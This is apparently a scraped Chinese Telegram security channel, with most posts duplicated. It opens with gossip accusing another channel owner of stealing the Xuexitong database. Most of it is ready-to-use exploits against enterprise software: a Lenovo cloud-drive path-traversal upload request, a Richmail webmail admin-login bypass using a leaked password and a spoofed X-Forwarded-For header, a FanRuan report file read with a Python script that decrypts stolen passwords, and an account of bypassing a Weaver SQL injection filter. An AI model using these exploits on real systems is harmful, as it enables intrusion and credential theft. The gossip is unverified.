Forwarded from GDP_信息安全(纪念版)
由于迟迟不到一万人 无法解散频道 于是我降低了要求 频道达到9500人 我就解散频道(给我一个跑的机会) 累了 不想做了 群解散 号不注销 防止有人偷我id诈骗
频道科普
https://news.1rj.ru/str/xxtxxxlplg
表面上的TG信息安全共享频道,但如果你在飞机网安圈子混得久一点你会记得他原来的名字,学习通数据跑路狗
去年学习通全库被干就是他搞的,后来分赃不均把他同伙开盒大头照都挂出来了,详见该频道最初的几条消息,https://news.1rj.ru/str/xxtxxxlplg/1
非常之恶俗
表弟说国家未来的网络安全接力棒就靠他了我是真的觉得哈人,他的效果我寻思恐怕不是网络安全,是让网络不安全🤡
https://news.1rj.ru/str/xxtxxxlplg
表面上的TG信息安全共享频道,但如果你在飞机网安圈子混得久一点你会记得他原来的名字,学习通数据跑路狗
去年学习通全库被干就是他搞的,后来分赃不均把他同伙开盒大头照都挂出来了,详见该频道最初的几条消息,https://news.1rj.ru/str/xxtxxxlplg/1
非常之恶俗
表弟说国家未来的网络安全接力棒就靠他了我是真的觉得哈人,他的效果我寻思恐怕不是网络安全,是让网络不安全🤡
👍6👎1
联想网盘任意文件上传漏洞
POST /write?neid=1&hash=../../../../../../../dragonball/srv/tomcat/webapps/stream_server/ttt.txt&status=1 HTTP/1.1
Host:xxxx
Cache-Control:max-age=0
Sec-Ch-Ua:"Chromium";v="117", "Not;A=Brand";v="8"
Sec-Ch-Ua-Mobile:?0
Sec-Ch-Ua-Platform:"Windows"
Upgrade-Insecure-Requests:1
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site:none
Sec-Fetch-Mode:navigate
Sec-Fetch-User:?1
Sec-Fetch-Dest:document
Accept-Language:zh-CN,zh;q=0.9
Connection:close
Content-Type:application/octet-stream
Accept-Encoding:gzip, deflate
Content-Length:8
POST /write?neid=1&hash=../../../../../../../dragonball/srv/tomcat/webapps/stream_server/ttt.txt&status=1 HTTP/1.1
Host:xxxx
Cache-Control:max-age=0
Sec-Ch-Ua:"Chromium";v="117", "Not;A=Brand";v="8"
Sec-Ch-Ua-Mobile:?0
Sec-Ch-Ua-Platform:"Windows"
Upgrade-Insecure-Requests:1
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site:none
Sec-Fetch-Mode:navigate
Sec-Fetch-User:?1
Sec-Fetch-Dest:document
Accept-Language:zh-CN,zh;q=0.9
Connection:close
Content-Type:application/octet-stream
Accept-Encoding:gzip, deflate
Content-Length:8
👍1🤔1
WEBMAIL任意用户登录漏洞
/RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin
回显是下面这个
"errorMsg":"64d880ce7b737912ccb1"
使用回显的 errormsg 作为密码,用户名为 admin 即可登录
使用手机验证码登录的打不了
显示 IP 受限的话添加头 X-Forwarded-For: 127.0.0.1 即可
如果有回显但登录失败的话,使用
/RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin@+证书 or 根域名获取 errormsg 然后在登录就行了
/RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin
回显是下面这个
"errorMsg":"64d880ce7b737912ccb1"
使用回显的 errormsg 作为密码,用户名为 admin 即可登录
使用手机验证码登录的打不了
显示 IP 受限的话添加头 X-Forwarded-For: 127.0.0.1 即可
如果有回显但登录失败的话,使用
/RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin@+证书 or 根域名获取 errormsg 然后在登录就行了
👍1
帆软报表 V8 get_geo_json 任意文件读取漏洞
WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
获得账号密码后进行解密,解密脚本如下
解密脚本
cipher = 'XXXXXXXXXXX' #密文
PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, 23]
Password = ""
cipher = cipher[3:]
for i in range(int(len(cipher) / 4)):
c1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16)
c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8]
Password = Password + chr(c2)
print (Password)
WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
获得账号密码后进行解密,解密脚本如下
解密脚本
cipher = 'XXXXXXXXXXX' #密文
PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, 23]
Password = ""
cipher = cipher[3:]
for i in range(int(len(cipher) / 4)):
c1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16)
c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8]
Password = Password + chr(c2)
print (Password)
👍1
xxl-rpc远程命令执行漏洞
影响产品
version<=1.7.0(最新版)
利用状态
在野利用(已公开poc)
漏洞详情
xxl-rpc是一个分布式服务框架,提供稳定高性能的RPC远程服务调用功能开源软件。
当攻击者能够访问xxl-rpc框架的服务方7080端口时,利用该漏洞可在无需认证的情况下执行任意命令,从而导致服务器被入侵控制。
处置建议:
目前官方未发布修复版本,建议通过白名单等方式临时限制xxl-rpc服务端口(默认「7080」)的访问权限,并且如无必要关闭对公网开放。
影响产品
version<=1.7.0(最新版)
利用状态
在野利用(已公开poc)
漏洞详情
xxl-rpc是一个分布式服务框架,提供稳定高性能的RPC远程服务调用功能开源软件。
当攻击者能够访问xxl-rpc框架的服务方7080端口时,利用该漏洞可在无需认证的情况下执行任意命令,从而导致服务器被入侵控制。
处置建议:
目前官方未发布修复版本,建议通过白名单等方式临时限制xxl-rpc服务端口(默认「7080」)的访问权限,并且如无必要关闭对公网开放。
👍1
「2023HW漏洞...1更新).pdf」,复制整段内容,打开最新版「夸克APP」即可获取。
无需下载在线播放视频,畅享原画5倍速,支持电视投屏。
/!b48831r4FG!:/
链接:https://pan.quark.cn/s/fbb38ab6826c
无需下载在线播放视频,畅享原画5倍速,支持电视投屏。
/!b48831r4FG!:/
链接:https://pan.quark.cn/s/fbb38ab6826c
pan.quark.cn
夸克网盘分享
夸克网盘是夸克推出的一款云服务产品,功能包括云存储、高清看剧、文件在线解压、PDF一键转换等。通过夸克网盘可随时随地管理和使用照片、文档、手机资料,目前支持Android、iOS、PC、iPad。
老年人复健泛微注入漏洞全过程实录
已知漏洞情报:后端mssql库cityaction区块存在注入,类型为堆叠注入,文件路径为/mobilemode/Action.jsp ,情报真实性未知。我不知道各位大黑客看到这个情报会第一时间关注哪里,我反正是最后一句。考恁娘,还好给出了具体的文件路径,白盒,就算是假的也不至于浪费很多时间
引入string invoker字符常量,调用getParameter方法处理参数,往下接受invoker这个参数并去掉了字符串两侧空格,new string对象进行第一次base64编码,中间还检查了参数是否为空,防止了基于回显的空行二次注入。17到19行检查参数是否是编码后的com.开头,如果不是就会把字符串进行一次base64解码。看到这里代码很常规并且很严格。往下看登录部分,代码是先检查了一下是否登录,没登录直接抛异常。检查登录后使用Class.forName去加载invoker这个全路径类名,26行检查加载的类是否是BaseAction.class的派生类,若是则会调用execute_proxy方法,不是则抛出异常
根据大学多年日弄.class文件的经验直觉告诉我肯定是BaseAction会出问题的。堆叠注入大多数是的存在场景是mysql+php里使用了mysqli_multi_query这种函数,他的存在条件比较严格。在这按照默认结束符非法造成sql语句堆叠的思路能干啥,最开始想的是getter/setter循环注入边变形成堆叠,具体思路懒得讲了,最后百度一下发现BaseAction在填充属性之前肯定在其他路径下Exception的某级缓存,问gpt他日🐴就说了一堆要注意过滤严格检查参数类型这种又大又空的废话,但是百度也提醒了我BaseAction的派生类,脑壳痛,cpu有点转不动了,先上tg吹吹水
吹完回来看一下这个父类,有两个函数一个是getAction(),我记混了记成jsp里面赋值过后提交表单到某某url.jsp的意思了,当时我人就麻了,cnm,这玩意审一下还得一起看其他jsp文件啊你特么鲨了我算了吧,然后单位的🐶头军师听到我我搁那叫马上就过来帮忙看了,又查了一下资料最后才搞清楚他的作用其实是用来获取请求参数上的action的值,和后面这个execute_proxy()一起,代理方法调用execute()方法,这个execute_proxy()才是jsp页面中真正调用的方法,必然有子类,这下舒服了。跟进查找可以找到BaseMobileAction.class。这个B什么什么的class文件已经实现了execute方法,但是他还是抽象类(不是我平时群里说的那个抽象)他肯定还有他的子类。联系他的上下文,首先通过getAction()方法获取了请求action的值,然后是getDeclareMethods()获取了自身类所有的全部方法,遍历了每一个方法然后获取上面的注解,如果name值不为空则执行该方法并获取结果,加上情报里说明了是堆叠,所以就很清晰的知道……
知道恁🐴,我当时看到这里的时候还是一点思路没有,因为我一直想的是泛微被打了这么多次过后对数组遍历之前的字符过滤是很严格的,我是真的没特么想到citites参数双重url编码一下就能绕过了,异想天开了半天都想到java api去了。然后就是到点下班吃晚饭,出门没了两分钟像睡醒一样突然反应过来。最后我们产品怎么更新来防范的就不讲了,商业机密,免得你们几个byd日穿雷池
已知漏洞情报:后端mssql库cityaction区块存在注入,类型为堆叠注入,文件路径为/mobilemode/Action.jsp ,情报真实性未知。我不知道各位大黑客看到这个情报会第一时间关注哪里,我反正是最后一句。考恁娘,还好给出了具体的文件路径,白盒,就算是假的也不至于浪费很多时间
引入string invoker字符常量,调用getParameter方法处理参数,往下接受invoker这个参数并去掉了字符串两侧空格,new string对象进行第一次base64编码,中间还检查了参数是否为空,防止了基于回显的空行二次注入。17到19行检查参数是否是编码后的com.开头,如果不是就会把字符串进行一次base64解码。看到这里代码很常规并且很严格。往下看登录部分,代码是先检查了一下是否登录,没登录直接抛异常。检查登录后使用Class.forName去加载invoker这个全路径类名,26行检查加载的类是否是BaseAction.class的派生类,若是则会调用execute_proxy方法,不是则抛出异常
根据大学多年日弄.class文件的经验直觉告诉我肯定是BaseAction会出问题的。堆叠注入大多数是的存在场景是mysql+php里使用了mysqli_multi_query这种函数,他的存在条件比较严格。在这按照默认结束符非法造成sql语句堆叠的思路能干啥,最开始想的是getter/setter循环注入边变形成堆叠,具体思路懒得讲了,最后百度一下发现BaseAction在填充属性之前肯定在其他路径下Exception的某级缓存,问gpt他日🐴就说了一堆要注意过滤严格检查参数类型这种又大又空的废话,但是百度也提醒了我BaseAction的派生类,脑壳痛,cpu有点转不动了,先上tg吹吹水
吹完回来看一下这个父类,有两个函数一个是getAction(),我记混了记成jsp里面赋值过后提交表单到某某url.jsp的意思了,当时我人就麻了,cnm,这玩意审一下还得一起看其他jsp文件啊你特么鲨了我算了吧,然后单位的🐶头军师听到我我搁那叫马上就过来帮忙看了,又查了一下资料最后才搞清楚他的作用其实是用来获取请求参数上的action的值,和后面这个execute_proxy()一起,代理方法调用execute()方法,这个execute_proxy()才是jsp页面中真正调用的方法,必然有子类,这下舒服了。跟进查找可以找到BaseMobileAction.class。这个B什么什么的class文件已经实现了execute方法,但是他还是抽象类(不是我平时群里说的那个抽象)他肯定还有他的子类。联系他的上下文,首先通过getAction()方法获取了请求action的值,然后是getDeclareMethods()获取了自身类所有的全部方法,遍历了每一个方法然后获取上面的注解,如果name值不为空则执行该方法并获取结果,加上情报里说明了是堆叠,所以就很清晰的知道……
知道恁🐴,我当时看到这里的时候还是一点思路没有,因为我一直想的是泛微被打了这么多次过后对数组遍历之前的字符过滤是很严格的,我是真的没特么想到citites参数双重url编码一下就能绕过了,异想天开了半天都想到java api去了。然后就是到点下班吃晚饭,出门没了两分钟像睡醒一样突然反应过来。最后我们产品怎么更新来防范的就不讲了,商业机密,免得你们几个byd日穿雷池
👍3